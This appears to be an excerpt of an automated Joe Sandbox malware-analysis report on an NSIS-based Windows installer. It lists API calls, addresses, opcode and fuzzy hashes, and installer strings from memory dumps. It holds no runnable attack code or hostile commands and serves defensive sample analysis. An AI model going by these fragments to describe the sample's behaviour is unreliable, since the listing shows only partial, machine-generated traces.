                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                        • API String ID: 1975747703-2904746566
                                        • Opcode ID: cb143dc0267d759a9cea0cd43f37dda2b3b0fb558001b9f08e92126bf8417459
                                        • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                                        • Opcode Fuzzy Hash: cb143dc0267d759a9cea0cd43f37dda2b3b0fb558001b9f08e92126bf8417459
                                        • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D
                                        APIs
                                        • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404523
                                        • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                                        • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 00404555
                                        • GetSysColor.USER32(?), ref: 00404566
                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                                        • lstrlenA.KERNEL32(?), ref: 00404587
                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                                        • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                                        • SendMessageA.USER32(00000000), ref: 00404610
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                                        • SetCursor.USER32(00000000), ref: 00404693
                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                                        • SetCursor.USER32(00000000), ref: 004046AC
                                        • SendMessageA.USER32(00000111,?,00000000), ref: 004046D8
                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: N$cD@
                                        • API String ID: 3103080414-2800326580
                                        • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                        • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                                        • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                        • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                                        APIs
                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,?), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextA.USER32(00000000,0042E820,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                        • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                                        • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                        • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                                        • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                                          • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                          • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                        • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                                        • wsprintfA.USER32 ref: 00405F6B
                                        • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                                        • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                                        • GlobalFree.KERNEL32(00000000), ref: 00406054
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                                          • Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                          • Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %s=%s$[Rename]
                                        • API String ID: 2171350718-1727408572
                                        • Opcode ID: 7fab33d9305e3d35eb4d6262b18c9d607ce8d1b4ed31532576ac5101631bdde8
                                        • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                                        • Opcode Fuzzy Hash: 7fab33d9305e3d35eb4d6262b18c9d607ce8d1b4ed31532576ac5101631bdde8
                                        • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                                        • SetWindowTextA.USER32(00000000,?), ref: 00404838
                                        • SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
                                        • CoTaskMemFree.OLE32(00000000), ref: 004048F4
                                        • lstrcmpiA.KERNEL32(0042DFC0,0042A488), ref: 00404926
                                        • lstrcatA.KERNEL32(?,0042DFC0), ref: 00404932
                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944
                                          • Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,757B3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,757B3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                          • Part of subcall function 00406587: CharNextA.USER32(0000000C,?,757B3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                          • Part of subcall function 00406587: CharPrevA.USER32(0000000C,0000000C,757B3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                        • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,?,00429458,?,?,000003FB,?), ref: 00404A02
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                                          • Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                          • Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
                                          • Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A
                                        • API String ID: 2624150263-3554254475
                                        • Opcode ID: 65010f81d111a107078dfd81cf5a0743528becb2b33aaf5c40ee420fb77efb02
                                        • Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
                                        • Opcode Fuzzy Hash: 65010f81d111a107078dfd81cf5a0743528becb2b33aaf5c40ee420fb77efb02
                                        • Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402F42
                                        • GetModuleFileNameA.KERNEL32(00000000,00436C00,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                                          • Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                          • Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,00435C00,00435C00,00436C00,00436C00,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
                                        • GlobalAlloc.KERNEL32(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0
                                        Strings
                                        • Inst, xrefs: 00403016
                                        • Error launching installer, xrefs: 00402F81
                                        • Null, xrefs: 00403028
                                        • 8TA, xrefs: 00402FBF
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403107
                                        • soft, xrefs: 0040301F
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: 8TA$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                        • API String ID: 2803837635-1977864323
                                        • Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                        • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                                        • Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                        • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(0042DFC0,00000400), ref: 00406452
                                        • GetWindowsDirectoryA.KERNEL32(0042DFC0,00000400,?,00429C68,00000000,00405409,00429C68,00000000,00000000), ref: 00406468
                                        • SHGetPathFromIDListA.SHELL32(00000000,0042DFC0,?,00405409,00000007,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064C7
                                        • CoTaskMemFree.OLE32(00000000,?,00405409,00000007,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064D0
                                        • lstrcatA.KERNEL32(0042DFC0,\Microsoft\Internet Explorer\Quick Launch,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064F4
                                        • lstrlenA.KERNEL32(0042DFC0,?,00429C68,00000000,00405409,00429C68,00000000,00000000,?,757B23A0), ref: 00406546
                                        Strings
                                        • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004064EE
                                        • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406423
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                        • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 4024019347-730719616
                                        • Opcode ID: 4f035e6071b976de3853a8921acfec8e3f6599c5ec55354fa89b4c1c1d35bef3
                                        • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                                        • Opcode Fuzzy Hash: 4f035e6071b976de3853a8921acfec8e3f6599c5ec55354fa89b4c1c1d35bef3
                                        • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D
                                        APIs
                                        • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                                        • GetSysColor.USER32(00000000), ref: 004043EF
                                        • SetTextColor.GDI32(?,00000000), ref: 004043FB
                                        • SetBkMode.GDI32(?,?), ref: 00404407
                                        • GetSysColor.USER32(?), ref: 0040441A
                                        • SetBkColor.GDI32(?,?), ref: 0040442A
                                        • DeleteObject.GDI32(?), ref: 00404444
                                        • CreateBrushIndirect.GDI32(?), ref: 0040444E
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                        • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                                        • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                        • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                                        APIs
                                        • lstrlenA.KERNEL32(00429C68,00000000,?,757B23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                        • lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,757B23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                        • lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,757B23A0), ref: 0040542D
                                        • SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2531174081-0
                                        • Opcode ID: 8f7b4f01caaf6d1e12ead9ba64632b4b1eb20c2348e45d3c9541951699492127
                                        • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                                        • Opcode Fuzzy Hash: 8f7b4f01caaf6d1e12ead9ba64632b4b1eb20c2348e45d3c9541951699492127
                                        • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8
                                        APIs
                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                                        • GetMessagePos.USER32 ref: 00404CA3
                                        • ScreenToClient.USER32(?,?), ref: 00404CBD
                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                        • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                                        • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                        • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                                        APIs
                                        • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E65
                                        • MulDiv.KERNEL32(?,00000064,?), ref: 00402E90
                                        • wsprintfA.USER32 ref: 00402EA0
                                        • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402E9A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                        • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                                        • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                        • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                        • wsprintfA.USER32 ref: 00406697
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004066AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%s.dll$UXTHEME$\
                                        • API String ID: 2200240437-4240819195
                                        • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                        • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                                        • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                        • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $q$$q$$q$$q$$q$$q$$q$$q
                                        • API String ID: 0-3886557441
                                        • Opcode ID: 92a5b8b9cd0670d3c4713a37139ce1c6299df740b4e3af8479173444e511ee96
                                        • Instruction ID: a02316e05f9c91a1691814a0a43eb1a5d3b76da60e88007c76cb9cbe4e0e69ef
                                        • Opcode Fuzzy Hash: 92a5b8b9cd0670d3c4713a37139ce1c6299df740b4e3af8479173444e511ee96
                                        • Instruction Fuzzy Hash: 51917CB4A00319DFFF24DBA5C955BBE7BB2EF48350F208429E801AB250DB759846DB91
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                                        • GlobalFree.KERNEL32(?), ref: 004028C9
                                        • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: a68628d14a43e02da4207674ff12a1b8572f7d1f991c83550e0ec062b3caa043
                                        • Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
                                        • Opcode Fuzzy Hash: a68628d14a43e02da4207674ff12a1b8572f7d1f991c83550e0ec062b3caa043
                                        • Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: ... %d%%
                                        • API String ID: 551687249-2449383134
